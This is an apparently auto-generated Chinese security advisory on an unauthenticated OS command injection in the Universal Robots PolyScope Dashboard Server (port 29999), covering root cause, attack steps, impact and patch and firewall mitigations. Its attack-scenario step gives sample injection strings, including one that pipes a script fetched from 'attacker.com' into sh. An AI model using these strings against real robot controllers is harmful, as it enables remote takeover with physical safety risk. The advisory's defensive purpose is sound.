📋 漏洞概述

Universal Robots PolyScope Dashboard Server接口存在OS命令注入漏洞，未授权攻击者可远程执行任意操作系统命令。

📋 基础信息

🔬 漏洞根因

Dashboard Server接口在处理用户输入的命令时，未对特殊字符（如分号、管道符、反引号）进行有效过滤或转义，且未对命令参数进行白名单校验，导致攻击者可通过构造恶意字符串拼接到系统命令中执行。推测该接口可能直接调用底层操作系统shell（如/bin/sh）执行命令，缺乏安全的命令执行封装（如subprocess库的shell=False模式）。

🎯 攻击场景

1. 攻击者通过网络扫描发现机器人控制器Dashboard Server服务的开放端口（通常为29999/TCP）。 2. 使用telnet或nc工具连接该端口，发送特制的命令字符串，例如：'load; id > /tmp/hacked.txt' 或 'play; curl http://attacker.com/evil.sh | sh'。 3. Dashboard Server解析命令时，将注入的命令段拼接到操作系统命令中执行。 4. 攻击者可在机器人操作系统上执行任意命令，如创建后门用户、下载恶意软件、修改机器人运动参数。 5. 成功标志：攻击者获得OS级别shell访问，或观察到目标系统执行了非预期操作。

💥 漏洞影响

攻击者无需任何认证即可远程实现操作系统命令执行（RCE），可能导致：机器人运动控制逻辑被篡改（物理安全风险）、生产数据泄露、固件植入后门、勒索软件部署、整个机器人被纳入僵尸网络。影响范围涵盖所有未打补丁的PolyScope控制柜系统。

🛡️ 修复建议

升级Universal Robots PolyScope至版本5.21.1或更高。临时缓解措施：在网络边界防火墙中限制Dashboard Server端口（29999/TCP）仅允许受信任的管理IP访问；禁用Dashboard Server接口（如通过配置文件关闭）；在机器人控制器的操作系统中部署HIDS监控异常命令执行。

📎 参考链接

• https://nvd.nist.gov/vuln/detail/CVE-2026-8153
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8153
• 原始来源（NVD-Latest）

⚠️ 本文由漏洞情报系统自动生成，仅供安全研究与防御参考。生成时间: 2026-05-10 08:11 | 来源: NVD-Latest